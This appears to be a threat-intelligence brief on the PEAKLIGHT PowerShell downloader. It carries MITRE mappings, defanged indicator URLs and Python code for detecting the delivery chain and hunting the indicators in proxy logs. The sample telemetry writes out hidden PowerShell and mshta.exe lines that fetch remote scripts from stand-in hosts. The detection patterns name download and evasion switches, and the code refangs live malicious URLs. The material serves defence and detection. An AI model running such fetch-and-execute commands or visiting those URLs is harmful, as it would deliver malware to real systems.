PEAKLIGHT is an obfuscated PowerShell downloader, identified by Mandiant, that delivers malware-as-a-service infostealers through Microsoft Shortcut (LNK) files. It uses a JavaScript dropper hosted on a CDN to execute malicious payloads, including LummaC2, HijackLoader, and CryptBot. The campaign illustrates how legitimate tools are abused for malware delivery while evading detection. Affected: Microsoft Shortcut Files, PowerShell, AutoIt
Key points:
- PEAKLIGHT is a PowerShell-based downloader delivering infostealers.
- Initial infection vector is a Microsoft Shortcut File (LNK).
- The downloader executes a PowerShell script that fetches malicious payloads.
- Payloads include LummaC2, HijackLoader, and CryptBot.
- Utilizes obfuscation techniques to evade detection.
- JavaScript dropper is hosted on a content delivery network (CDN).
- Employs mshta.exe to execute scripts and download additional payloads.
- Malware analysis reveals complex obfuscation and encryption methods.
- Campaign demonstrates the misuse of legitimate tools for malicious purposes.
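A detection sketch for the delivery chain summarised in the key points above (a double-extension LNK lure, a PowerShell download stage launched with non-interactive switches, and mshta.exe pulling a remote script). This is an added example, not code from the original report or from Mandiant: the process events are constructed Sysmon-style records, the inner-extension list and rule names are assumptions, and the parent-child order of the constructed events is an assumption (only the explorer.exe-to-powershell.exe pair is used by a rule).

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    pid: int
    ppid: int
    image: str     # full path of the new process
    cmdline: str   # its command line


# A document-looking name with a trailing .lnk, as in the lure names in the IoC list.
# The set of inner extensions is an assumption; extend it for your estate.
LURE_LNK = re.compile(r"\.(?:pdf|docx?|xlsx?|pptx?|txt)\.lnk$", re.I)
# Real powershell.exe switches rarely typed by hand: hidden window, encoded
# command, no profile, execution-policy bypass.
PS_EVASION_FLAGS = re.compile(
    r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|e(?:nc(?:odedcommand)?)?\s|"
    r"nop(?:rofile)?\b|e(?:p|xecutionpolicy)\s+bypass)",
    re.I,
)
# Built-in download primitives a PowerShell downloader stage could use.
PS_DOWNLOAD = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|net\.webclient", re.I
)
REMOTE_URL = re.compile(r"https?://", re.I)

# Constructed telemetry: Explorer launches a hidden PowerShell that downloads,
# then mshta.exe runs a remote script; two benign events are mixed in as noise.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -nop -c "Invoke-WebRequest https://cdn.example.invalid/stage.js"'),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://cdn.example.invalid/stage2.hta"),
    ProcEvent(400, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),
    ProcEvent(500, 100, r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\alice\tools\helper.hta"),
]


def is_lure_lnk(filename: str) -> bool:
    """True for double-extension shortcut names such as report.pdf.lnk."""
    return bool(LURE_LNK.search(filename.replace("/", "\\").rsplit("\\", 1)[-1]))


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (pid, rule_name) findings for a slice of process-creation events."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = _basename(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = _basename(parent.image) if parent else ""
        if name == "powershell.exe":
            # Explorer spawning PowerShell is what a double-clicked LNK target looks like.
            if parent_name == "explorer.exe" and PS_EVASION_FLAGS.search(e.cmdline):
                findings.append((e.pid, "powershell_hidden_from_explorer"))
            if PS_DOWNLOAD.search(e.cmdline):
                findings.append((e.pid, "powershell_download"))
        elif name == "mshta.exe" and REMOTE_URL.search(e.cmdline):
            findings.append((e.pid, "mshta_remote_script"))
    return findings


if __name__ == "__main__":
    print(is_lure_lnk("Instruction_1928_W9COI.pdf.lnk"))
    for pid, rule in detect(SAMPLE_EVENTS):
        print(pid, rule)
```

Each rule fires independently, so a hunt can pivot from any one of them; correlating two or more on the same host within a short window is what separates this chain from an administrator opening PowerShell or a signed HTA.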
MITRE Techniques:
- T1203 – Exploitation for Client Execution: Utilizes Microsoft Shortcut Files to exploit vulnerabilities.
- T1059.001 – Command and Scripting Interpreter: PowerShell is used to execute scripts and commands.
- T1071.001 – Application Layer Protocol: Communication with remote servers via HTTP/HTTPS.
- T1486 – Data Encrypted for Impact: Encrypted payloads are used to obfuscate malicious actions.
- T1105 – Ingress Tool Transfer: Downloads additional payloads from remote servers.
Indicators of Compromise:
- [url] hxxp://download.wsconnect[.]org/Downloads/Instruction_1928_W9COI.pdf.lnk
- [url] hxxp://download.wsconnect[.]org/Downloads/Agreement%20for%20YouTube%20cooperation.pdf.lnk
- [url] hxxps://docu-sign[.]info/api/uz/0912545164/update.bin
- [url] hxxps://docu-sign[.]info/api/uz/0912545164/config.bin
- See the full article for the complete list of IoCs.
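To use the defanged indicators above in a proxy-log hunt they must be refanged first. The following added example (not from the original report) does that, then matches the result against a few constructed Squid-style access.log lines, reporting an exact URL hit separately from a hit on the same host with a different path. The log contents, client addresses and the RFC 5737 documentation-range upstream addresses are constructed.

```python
import re
from urllib.parse import urlsplit

# The four URL indicators from the list above, exactly as published (defanged).
DEFANGED_IOCS = """
- [url] hxxp://download.wsconnect[.]org/Downloads/Instruction_1928_W9COI.pdf.lnk
- [url] hxxp://download.wsconnect[.]org/Downloads/Agreement%20for%20YouTube%20cooperation.pdf.lnk
- [url] hxxps://docu-sign[.]info/api/uz/0912545164/update.bin
- [url] hxxps://docu-sign[.]info/api/uz/0912545164/config.bin
"""

# Constructed Squid access.log lines; one exact IoC hit, two same-host hits, one benign.
SAMPLE_ACCESS_LOG = [
    "1724000001.101 211 10.0.0.5 TCP_MISS/200 4180 GET http://download.wsconnect.org/Downloads/Instruction_1928_W9COI.pdf.lnk - HIER_DIRECT/203.0.113.7 application/octet-stream",
    "1724000002.214 150 10.0.0.5 TCP_TUNNEL/200 9120 CONNECT docu-sign.info:443 - HIER_DIRECT/198.51.100.9 -",
    "1724000003.330 96 10.0.0.6 TCP_MISS/200 1320 GET https://www.example.com/index.html - HIER_DIRECT/192.0.2.1 text/html",
    "1724000004.440 120 10.0.0.7 TCP_MISS/200 2210 GET https://docu-sign.info/api/uz/0912545164/other.bin - HIER_DIRECT/198.51.100.9 application/octet-stream",
]


def refang(ioc: str) -> str:
    """Undo common defanging: hxxp(s) -> http(s); [.] (.) {.} -> '.'."""
    s = re.sub(r"^hxxp", "http", ioc.strip(), flags=re.I)
    return re.sub(r"[\[({]\.[\])}]", ".", s)


def parse_ioc_list(text: str) -> list:
    """Pull the '[url]' entries out of the bullet list and refang them."""
    urls = []
    for line in text.splitlines():
        m = re.match(r"-\s*\[url\]\s*(\S+)", line.strip())
        if m:
            urls.append(refang(m.group(1)))
    return urls


def _host_path(url: str):
    # CONNECT lines carry only host:port, so give urlsplit a scheme-less netloc.
    p = urlsplit(url if "://" in url else "//" + url)
    return (p.hostname or "").lower(), p.path


def match_proxy_log(lines, ioc_urls):
    """Return (request_target, match_kind) for every log line touching an IoC."""
    exact = {_host_path(u) for u in ioc_urls}
    hosts = {h for h, _ in exact}
    hits = []
    for line in lines:
        m = re.search(r"\b(?:GET|POST|CONNECT)\s+(\S+)", line)
        if not m:
            continue
        target = m.group(1)
        host, path = _host_path(target)
        if (host, path) in exact:
            hits.append((target, "url_match"))
        elif host in hosts:
            hits.append((target, "host_match"))
    return hits


if __name__ == "__main__":
    iocs = parse_ioc_list(DEFANGED_IOCS)
    for target, kind in match_proxy_log(SAMPLE_ACCESS_LOG, iocs):
        print(kind, target)
```

A host-level hit on a TLS CONNECT is all a proxy will see for the HTTPS paths in the list, so the host match is the signal that matters there; the path comparison is deliberately left URL-encoded so that the `%20` indicator lines up with what the proxy logged.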
Full Research: https://medium.com/trac-labs/peaklight-illuminating-the-shadows-02a1bb44885c